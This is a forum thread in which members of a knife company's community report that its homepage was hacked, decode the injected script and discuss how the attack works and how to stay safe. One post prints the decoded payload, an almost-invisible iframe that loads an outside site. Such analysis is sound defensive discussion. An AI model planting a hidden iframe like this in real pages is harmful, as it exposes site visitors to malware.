Bussecombat.com DOWN?

Elen said:
: seems that someone has sneaked a malicious javascript on the bussecombat.com front page.
Click to expand...


I know nothing about PC's, but if thats the case, I hope its possible to find out who did it!

I know a couple have left here with hurt feelings, but don't think they would know enough to do this.
 
If you decipher that JavaScript nastiness, it becomes the following HTML:

Code: 
<iframe src="http://nuotoll.com/" width="1" height="3"></iframe>

Anyway, Jerry is now aware of this.
 
Ken44 said:
I know nothing about PC's, but if thats the case, I hope its possible to find out who did it!

I know a couple have left here with hurt feelings, but don't think they would know enough to do this.
Click to expand...

It's almost certainly just some random internet criminal who knows nothing about Busse Combat, just out trying to infect any site they can to spread whatever crap software they feel like spreading: maybe one of those fake security programs, like Antivirus 2009, that detect imaginary viruses and try to cheat people to pay for the "full version" of the software to remove the viruses, or the even more lowly common trojan that tries to steal banking info and passwords or can be used in denial of service attacks or email spam and what not. The internet is worse than the wild west ever was when it comes to upholding the laws. :rolleyes:
 
Now here's a good little link for anyone looking for basic information about how stuff like this happens: http://www.stopbadware.org/home/security

In this case, the most interesting part is 5. Hacking attacks to your site. This was a code injection attack that injects a rogue iframe into the target site (bussecombat.com), and this rogue iframe in turn redirects invisibly to a different site that may try to install malicious software. Normally these attacks make invisible iframes, but if you guys look closely at the upper left corner of the pages, you can see a very small white box that is actually the "almost invisible" iframe that links to the nuotoll dot com site. For some reason the attacker has set the iframe dimensions as greater than 0, or in this case as Lunde already demonstrated width="1" and height="3", so the frame is not entirely invisible.

Attacks like this can only succeed if there's some kind of a security vulnerability on the site/server, so it's important to identify and close the vulnerability that the attacker used in this case so it doesn't happen again, or in a nastier way.

The net is full of low life criminals making a living on attacking businesses and private citizens and just plain everyone. And law enforcement is generally helpless, especially as many of the criminals operate from countries where the law really couldn't care any less. :rolleyes:
 
Well,I just had to check...
What I see flash by in the lower corner of firefox is
the following
"http://foxionserl.com/"
I am running nthe latest firefox with adblock ad-on installed.
No warnings or anything from firefox,norton,or zone-alarm.
The busse page loads fine,but I did see that other address flash
and out of curiosity,I went to that site and see
an advertisement for viagra.
 
Elen said:
Now here's a good little link for anyone looking for basic information about how stuff like this happens: http://www.stopbadware.org/home/security

In this case, the most interesting part is 5. Hacking attacks to your site. This was a code injection attack that injects a rogue iframe into the target site (bussecombat.com), and this rogue iframe in turn redirects invisibly to a different site that may try to install malicious software. Normally these attacks make invisible iframes, but if you guys look closely at the upper left corner of the pages, you can see a very small white box that is actually the "almost invisible" iframe that links to the nuotoll dot com site. For some reason the attacker has set the iframe dimensions as greater than 0, or in this case as Lunde already demonstrated width="1" and height="3", so the frame is not entirely invisible.

Attacks like this can only succeed if there's some kind of a security vulnerability on the site/server, so it's important to identify and close the vulnerability that the attacker used in this case so it doesn't happen again, or in a nastier way.

The net is full of low life criminals making a living on attacking businesses and private citizens and just plain everyone. And law enforcement is generally helpless, especially as many of the criminals operate from countries where the law really couldn't care any less. :rolleyes:
Click to expand...

That was interesting. Thank you.
 
got the warning too using safari on my iMac, malware inside the site
hope they can fix the problem soon

Maxx
 
Just a heads up folks - just because you aren't getting warnings doesn't mean you're safe. These sorts of things can infect your PC with all kinds of nastiness without ever making a peep. In fact, the folks who ARE getting the warnings are probably the safe ones. Those of you who went to the site and didn't see any kind of warning should be cautious. Now is probably a good time to install a quality firewall and update your antivirus software just in case.
 
MustardMan said:
Just a heads up folks - just because you aren't getting warnings doesn't mean you're safe. These sorts of things can infect your PC with all kinds of nastiness without ever making a peep. In fact, the folks who ARE getting the warnings are probably the safe ones. Those of you who went to the site and didn't see any kind of warning should be cautious. Now is probably a good time to install a quality firewall and update your antivirus software just in case.
Click to expand...

Thanks for the heads up MM. I got a warning earlier, but now no warnings are issued.
 
Our guy got it fixed!!!. . . Thanks for the heads up HOGs!!!!!

Great work Dave!!!!

Jerry :D






.
 
You must log in or register to reply here.
Back
Top